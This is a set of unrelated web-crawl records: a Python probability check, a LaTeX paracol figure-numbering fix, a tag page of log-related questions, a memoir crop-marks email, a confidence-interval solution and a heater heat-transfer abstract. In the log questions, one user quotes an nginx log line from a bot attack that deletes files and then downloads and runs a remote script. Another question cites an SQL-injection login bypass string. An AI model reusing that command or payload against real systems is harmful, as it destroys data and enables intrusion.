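        m += exp(e * (log1p(-s / t) if 2 * s < t else log((t - s) / t)))
        c = c * (b - k) // (k + 1)
    return m

def monte_carlo(b, n, trials=2000, seed=0):
    # brute force: sample n random b-bit strings, take the minimum
    # pairwise Hamming distance, and average over many trials
    rng = random.Random(seed)
    total = 0
    for _ in range(trials):
        xs = [rng.getrandbits(b) for _ in range(n)]
        total += min(bin(x ^ y).count("1")
                     for i, x in enumerate(xs) for y in xs[i + 1:])
    return total / trials

assert abs(f(10, 2) - 5.0) < 1e-9            # n = 2 gives exactly b/2
assert abs(f(16, 8) - monte_carlo(16, 8)) < 0.5
```

For parameters like $$b = 16, n = 8$$ the two estimates agree well within the challenge's $$\pm 0.5$$ tolerance, consistent with the answer's claim that the approximation error shrinks as $$b$$ and $$n$$ grow.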
https://tex.stackexchange.com/questions/358460/paracol-have-column-wise-floats-numbered-in-order-of-appearance/358529
# paracol: have column-wise floats numbered in order of appearance?

I'm typesetting (non-synchronized) parallel columns with paracol.sty – a translation actually, one language in the left, the other in the right column. The document contains a lot of "column-wise" floats (that is, floats typeset within a column). As paracol reads and processes the whole left column (stretching over various pages) before the right column, all the floats in the left column are numbered before the floats in the right column, even when they appear on a later page. This leads to the floats appearing in an unordered way given the linear appearance in the flow of the pages.

Is there a way to work around this? I need to keep the floats as column-wise floats (so they may not break the two-column layout). Is there a way to modify the counter mechanism to have the numbers follow the order of appearance? Or at least in order of pages? (That is, within a page I don't mind if all left column floats are numbered before the right column floats, but this should not stretch across pages.) Or do I have to implement a "manual" numbering using \setcounter{figure}{0} etc.?

Thanks a lot!

PS: I know that the paracol manual says that this "problem" occurs. But maybe someone has an idea how to resolve it.

MWE:

```latex
\documentclass{article}
\usepackage{paracol}
\usepackage{lipsum}
\globalcounter{figure}
\begin{document}
\begin{paracol}{2}
\lipsum[1-3]
\begin{figure}[t]
\caption{The caption}
\label{Label1}
\end{figure}
\lipsum[2]
\switchcolumn
\begin{figure}[t]
\caption{The caption}
\label{Label2}
\end{figure}
\lipsum[1-3]
\end{paracol}
\end{document}
```

The following example shows figure 2 appearing before figure 1 if following the order of the pages.

• The paracol manual explicitly states that t-float environments are problematic in synchronizing columns. You have t-float environments ;-) (requires caption package) – user31729 Mar 14 '17 at 18:19
• Yes I know, the manual mentions this.
So it's not a bug report, but maybe someone has a solution! BTW, the problem doesn't depend on the 't' positioning, it also occurs with 'h'. The problem is that numbers are given in order of source code and the whole left column is processed and broken across pages before the right column is processed. – LaTechneuse Mar 14 '17 at 18:25
• Do you use hyperref and links? If not, there might be an easy solution. – user31729 Mar 14 '17 at 18:31
• Have you tried to remove the \globalcounter{figure} statement? – user31729 Mar 14 '17 at 18:35
• Removing the statement would produce separate numbering of the floats in each column, which is not what I'm looking for. And yes, alas, I'm using hyperref. – LaTechneuse Mar 14 '17 at 18:51

This will fix \caption, \label and \listoffigures. Note that it takes (at least) two runs. One must add \useparafig before \caption. It redefines \thefigure for the rest of the figure environment (or current group). It works by creating a translation table between \thefigure and the order in which the figures actually appear (\theparafig).

```latex
\documentclass{article}
\usepackage{paracol}
\usepackage{lipsum}
\globalcounter{figure}
\newcounter{parafig}
\newcommand{\newparafig}[1]{\stepcounter{parafig}%
  \expandafter\xdef\csname parafig#1\endcsname{\theparafig}}
\makeatletter
\newcommand{\useparafig}{\protected@write\@auxout{}{\string\newparafig{\thefigure}}%
  \@ifundefined{parafig\thefigure}{}%
  {\edef\parafig{\csname parafig\thefigure\endcsname}%
  \let\thefigure=\parafig}}
\makeatother
\begin{document}
\listoffigures\newpage
\sloppy
\begin{paracol}{2}
\lipsum[1-3]
\begin{figure}[t]
\useparafig
\caption{The caption}
\label{Label1}
\end{figure}
\lipsum[2]
\switchcolumn
\begin{figure}[t]
\useparafig
\caption{The caption}
\label{Label2}
\end{figure}
\lipsum[1-3]
\end{paracol}
\end{document}
```

• Thanks, that's an amazing solution! That makes paracol a very powerful solution for publishing two-column translations. – LaTechneuse Mar 15 '17 at 14:24
https://proxies123.com/tag/log/
## calculus and analysis – Integral of $r \frac{2^{r-1} \log(2) e^{-\frac{\sqrt{2^r-1}}{b}} \left(2^r-1\right)^{\frac{d}{2}-1}}{b^d \Gamma(d)}$ with Mathematica

I'm trying to find the integral given below with Mathematica

$$\int_0^{\infty} r \frac{2^{r-1} \log(2) e^{-\frac{\sqrt{2^r-1}}{b}} \left(2^r-1\right)^{\frac{d}{2}-1}}{b^d \Gamma(d)} \, dr$$

However, it takes too long for it to return something, and when it returns it outputs the same integral:

$$\int_{0}^{\infty} \frac{2^{r-1} r \log(2) b^{-d} e^{-\frac{\sqrt{2^r-1}}{b}} \left(2^r-1\right)^{\frac{d}{2}-1}}{\Gamma(d)} \, dr$$

I'd like to figure out the solution for this integral.

## log analysis – Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

``````
170.81.46.70 - - "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
93.157.62.102 - - "GET / HTTP/1.1" 301 169 "http://(IP OF MY SERVER):80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
218.161.62.117 - - "GET / HTTP/1.1" 400 157 "-" "-"
61.96.64.130 - - "GET / HTTP/1.1" 400 157 "-" "-"
``````

The IPs are, needless to say, not expected for this server. I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?

I should say that I do not have a solid background in security. I am a software developer, and I am writing here to start reasoning about a new task (somehow related to security) that I have to implement; maybe someone here can help me clarify the situation. Basically I have to implement the following: an application produces logs (standard-output text files) and I have to bring these logs into QRADAR SIEM. So my doubts are: 1.
From what I know (absolutely not sure of this assertion): first of all I have to convert these log files into CEF format (Common Event Format), and then I can give this format to QRADAR. Does that make sense to you? 2. What about the automatic import of this converted CEF format? Does QRADAR provide an API that I can call, passing it the events, or something similar?

## logging – Is it possible to lose logcat messages if I log too frequently?

I instrument the app to make it log a message at the entry and exit of each method. The size of each message is about 12 characters. However, I find that some messages read from logcat are lost (I indexed each message to check this). E.g. (a – b means logs from a to b are missing):

missing logs: 468 – 749
missing logs: 1308 – 1428
missing logs: 1725 – 1942
missing logs: 2023 – 2034
missing logs: 2375 – 2646
missing logs: 3075 – 3288

I also tried buffering the messages up to 400 characters and then calling Log.println() once the buffer filled up, instead of calling Log.println() each time. When I do this, no messages are lost. Since the total size of the messages is the same either way, the problem is not the size of the logcat ring buffer (I also set the size to its maximum: 256M). Is it because the app logs too frequently?

## Does pgBadger (PostgreSQL log analyzer) really not have a version for Windows?

I need to figure out the bottleneck queries in my system. Since I remember using pgBadger years ago, in the era when I still tortured myself with Unix, I went to their website to fetch the Windows installer and start re-figuring out how to use it… There is no Windows installer. There is actually no mention of Windows whatsoever. Does this mean that this is one of those FOSS projects which pretend that Windows doesn't exist and make it as difficult as possible to run it on the "one and only" desktop OS? I frankly expected that slick site to have a nice installer, which PostgreSQL and PostGIS have, but… apparently not?
I strongly suspect that pgBadger is the best such software, but I'm also willing to listen if there is an excellent Windows-supporting alternative.

PS: I don't like Windows. It's a living nightmare these days. It's just that the "alternatives" are even worse in my long and consistent experience. Whether you agree with this or not, this is what I have been forced to conclude repeatedly over the last 20 years.

## sql injection – How can I write a function that will log a user in an old system without knowing any username or password?

I'll be more specific: I'm studying Internet Security, and in my homework I must answer the question described below. I learned something about code injection in older websites (using the string ' OR 1 == 1 // as the username will log in with any password provided); but what if the password related to a username is stored on the server in a folder with the following path: which credentials will log me into the system, without knowing any legitimate usernames or passwords? Furthermore, the question specifies that the login system is installed on a computer running an OS, and that this operating system is known to have a file with its version (in this case, 1.0.3) in "/system/version.txt". Honestly, I do not know how this last point relates to the question, but I hope someone can help me understand what the right answer could be, and if and how this detail about the system version is related to the answer. Thank you very much 🙂

## Clear log files in /var/log

Hi, I have a server with a disk quota problem. I will do a migration soon but need to buy some time until then. Can I remove these files in the /var/log directory to get back under the disk quota?

maillog-123456789: I have many files with this name
cxs.log: I have only 1 file with this name, but its size is 273 MB
chkservd.log: I have only 1 file with this name, but its size is 103 MB

Thank you very much.
## Parse log of PostgreSQL into database

I want to load information about query execution from the PostgreSQL log into a database table: query execution time, query start time, and query text. Does any simple solution exist?
2020-07-10 09:31:13
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 2, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3289264738559723, "perplexity": 2120.9475618705005}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655906934.51/warc/CC-MAIN-20200710082212-20200710112212-00526.warc.gz"}
https://tug.org/pipermail/macostex-archives/2010-May/043796.html
# [OS X TeX] [Slightly OT] Crop marks over a full page image

David Watson dewatson at me.com
Sat May 15 15:29:56 CEST 2010

Thanks to everyone for the suggestions. I may yet have to use them for this project, if the printer doesn't like what I have now. I was able to do most everything with the functionality provided by memoir. For anyone interested in taking a look at the layout of the Book of Abstracts, I have placed a copy on our webserver: http://www.malto2010.org/BoA.pdf

On May 14, 2010, at 11:58 PM, Axel E. Retif wrote:

> On 14 May, 2010, at 20:44, David Watson wrote:
>
>> I am currently in the process of compiling a book of abstracts for a meeting-in-miniature.
>> For this work, I am using the document class memoir.
>> The printer wants bleeds of 0.125 inches for the cover page, and crop marks, which I've figured out how to do for the remainder of the document (resetting \stockheight and \stockwidth and using \settrims).
>> The cover page is a real doozy, however, because the bleeds cover the crop marks.
>
> On 14 May, 2010, at 22:40, Alan T Litchfield wrote:
>
>> I am surprised the printer is asking you to do this.
>
> I don't think it is uncommon, and it's not that hard ---I use a combination of the geometry and crop packages for that.
>
> And for the bleeding, the package sidecap (even without a caption!) comes in handy, as with it a wide environment is defined; it allows one to use the margin area, e.g., for figures wider than \textwidth ---just don't make the image so big as to cover the crop marks. Some manual adjustment might be necessary; for example, for a frontispiece I did
>
> \thispagestyle{empty}
> \begin{figure}[h!]
> \vspace*{-8.5pc}
> \begin{wide}
> \hspace*{-6.6pc}\includegraphics{frontispicio_cred_8pt}
> \end{wide}
> \end{figure}
>
> Best,
>
> Axel
>
> ----------- Please Consult the Following Before Posting -----------
> TeX FAQ: http://www.tex.ac.uk/faq
> List Reminders and Etiquette: http://email.esm.psu.edu/mac-tex/
> List Archive: http://tug.org/pipermail/macostex-archives/
> TeX on Mac OS X Website: http://mactex-wiki.tug.org/
> List Info: http://email.esm.psu.edu/mailman/listinfo/macosx-tex
2023-02-06 23:22:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8891311287879944, "perplexity": 4644.998729894857}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500365.52/warc/CC-MAIN-20230206212647-20230207002647-00102.warc.gz"}
https://novelanswer.com/a-random-sample-of-100-light-bulbs-has-a-mean-lifetime-of-3000-hours-assume-that-the-population-standard-deviation-of-the-lifetime-is-500/
# Solved (Free): A random sample of 100 light bulbs has a mean lifetime of 3000 hours. Assume that the population standard deviation of the lifetime is 500

#### By Dr. Raju Chaudhari, Apr 3, 2021

A random sample of 100 light bulbs has a mean lifetime of 3000 hours. Assume that the population standard deviation of the lifetime is 500 hours. Construct a 95% confidence interval estimate of the mean lifetime.

#### Solution

Given that sample size $n = 100$, sample mean $\overline{X}= 3000$ and population standard deviation $\sigma = 500$.

#### Step 1: Specify the confidence level $(1-\alpha)$

The confidence level is $1-\alpha = 0.95$. Thus, the level of significance is $\alpha = 0.05$.

#### Step 2: Given information

Sample size $n =100$, sample mean $\overline{X}=3000$ and population standard deviation $\sigma = 500$.

#### Step 3: Specify the formula

The $100(1-\alpha)$% confidence interval for the population mean $\mu$ is
\begin{aligned} \overline{X} - E \leq \mu \leq \overline{X} + E \end{aligned}
where $E = Z_{\alpha/2} \frac{\sigma}{\sqrt{n}}$, and $Z_{\alpha/2}$ is the $Z$ value providing an area of $\alpha/2$ in the upper tail of the standard normal probability distribution.

#### Step 4: Determine the critical value

The critical value of $Z$ for the given level of significance is $Z_{\alpha/2}$. Thus $Z_{\alpha/2} = Z_{0.025} = 1.96$.

#### Step 5: Compute the margin of error

The margin of error for the mean is
\begin{aligned} E & = Z_{\alpha/2} \frac{\sigma}{\sqrt{n}}\\ & = 1.96 \frac{500}{\sqrt{100}} \\ & = 98. \end{aligned}

#### Step 6: Determine the confidence interval

The $95$% confidence interval estimate for the population mean is
\begin{aligned} \overline{X} - E & \leq \mu \leq \overline{X} + E\\ 3000 - 98 & \leq \mu \leq 3000 + 98\\ 2902 & \leq \mu \leq 3098. \end{aligned}

Thus, the $95$% confidence interval for the mean lifetime is $(2902, 3098)$.
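The steps above are easy to double-check programmatically. The sketch below is an editorial addition, not part of the original solution; it uses the standard library's `NormalDist` for the critical value:

```python
from statistics import NormalDist

# Known quantities from the problem statement
n, xbar, sigma = 100, 3000, 500
alpha = 0.05

# Critical value z_{alpha/2} from the standard normal distribution
z = NormalDist().inv_cdf(1 - alpha / 2)  # ~1.96

# Margin of error and confidence limits
E = z * sigma / n ** 0.5
lower, upper = xbar - E, xbar + E

print(round(z, 2), round(E), (round(lower), round(upper)))
# prints: 1.96 98 (2902, 3098)
```

Using the exact critical value 1.9600 rather than the rounded 1.96 changes the margin of error only in the third decimal place, so the interval matches the hand calculation after rounding.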
2022-05-17 13:38:55
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9996607303619385, "perplexity": 601.9181888132694}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662517485.8/warc/CC-MAIN-20220517130706-20220517160706-00262.warc.gz"}
http://www.koreascience.or.kr/article/ArticleFullRecord.jsp?cn=DHGGDU_1998_v22n4_551
Heat transfer characteristics around a circular combustion chamber of kerosene fan heater

Title & Authors
Heat transfer characteristics around a circular combustion chamber of kerosene fan heater
Kim, Jang-Gwon;

Abstract
This paper studied the characteristics of the heat transfer coefficients and surface temperature distributions around a circular combustion chamber within the heat-intercept duct of a kerosene fan heater. The experiment was carried out in the heat-intercept duct of a kerosene fan heater attached to a blow-down-type subsonic wind tunnel with a test section of 240 mm x 240 mm x 1200 mm. The purpose of this paper was to obtain basic data on normal combustion for a new design of conventional kerosene fan heater, and to investigate the effect of the flow-rate of the convection axial fan on surface temperature and on the local and mean heat transfer coefficients under varying heat release conditions during normal combustion. Consequently it was found that (i) the rotational speed of the convection axial fan during combustion was lower than during non-combustion because of the thermal resistance due to the high temperature in the heat-intercept duct, (ii) the pressure ratio $P_2/P_1$ had a comparatively constant value of 0.844 as the rotational speed of the turbo fan increased, and the heating performance of the kerosene fan heater ranged over 1,494 ~ 3,852 kcal/hr, (iii) the local heat transfer coefficient around the circular combustion chamber was comparatively larger in the range $315^{\circ} < \theta < 45^{\circ}$ than in the range $90^{\circ} < \theta < 270^{\circ}$
as a result of the heat transfer difference between the front and back of the circular combustion chamber, and (iv) the mean heat transfer coefficient around the circular combustion chamber increased linearly as $H_m = 95.196Q + 104.019$ under high heat release conditions with increasing flow-rate of the axial fan.

Language: Korean
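For convenience, the linear correlation reported in the abstract can be turned into a small helper. This is an editorial sketch: the flow-rate values below are purely illustrative, since the abstract does not restate the units or the valid range of Q.

```python
def mean_heat_transfer_coeff(q: float) -> float:
    """Mean heat transfer coefficient around the combustion chamber,
    using the linear correlation H_m = 95.196*Q + 104.019 reported in
    the abstract. Valid only for the high-heat-release condition; the
    units of Q and H_m follow the paper and are not restated here."""
    return 95.196 * q + 104.019

# Illustrative values over a hypothetical range of fan flow-rates
for q in (0.5, 1.0, 1.5):
    print(q, round(mean_heat_transfer_coeff(q), 3))
```

Note that the intercept 104.019 is the correlation's extrapolated value at zero flow-rate, not a measured quantity; the correlation should only be trusted within the flow-rate range of the original experiment.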
2018-03-20 12:14:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 3, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.49687615036964417, "perplexity": 1487.5855829894006}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257647406.46/warc/CC-MAIN-20180320111412-20180320131412-00704.warc.gz"}